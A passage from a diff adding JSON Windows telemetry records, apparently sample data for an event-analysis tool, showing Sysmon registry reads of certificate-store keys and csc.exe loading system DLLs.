"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860110000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 